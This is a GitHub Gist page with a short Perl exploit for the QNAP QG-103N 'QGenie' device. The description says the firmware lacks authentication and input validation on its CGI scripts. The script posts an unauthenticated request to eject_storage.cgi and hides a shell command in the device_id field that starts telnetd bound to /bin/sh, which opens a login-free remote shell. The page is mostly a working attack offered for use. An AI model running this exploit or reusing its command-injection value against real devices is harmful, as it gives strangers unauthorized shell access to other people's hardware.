Last active
April 21, 2026 23:45
-
-
Save wildstray/2803b6cca2835f5a1721d7ffc377078f to your computer and use it in GitHub Desktop.
QNAP QG-103N "QGenie" hack: remote execution of telnetd ;-) It seems that QGenie firmware was originally something other (router?) from AXIMCom. Its firmware (up to last version available, 3.2.2) is really insecure: no privilege separation, no input validation neither user authentication for CGI scripts.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/perl | |
| use strict; | |
| use warnings; | |
| use LWP::UserAgent; | |
| use HTTP::Request::Common qw(GET POST); | |
| my ($nas_ip) = @ARGV; | |
| die "$0 <QGenie_IP_Address>\n" if (not defined $nas_ip); | |
| my $ua = new LWP::UserAgent(timeout => 20, requests_redirectable => []); | |
| my $payload = 'telnetd$IFS-l$IFS/bin/sh'; | |
| my $script = 'eject_storage.cgi'; | |
| my $response = $ua->request(POST "http://$nas_ip/$script", [device_id=>"AAA;$payload;#"]); | |
| print $response->content; | |
| print "\n"; |
Author
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Some interesting commands of QGenie... it seems is has some sensors...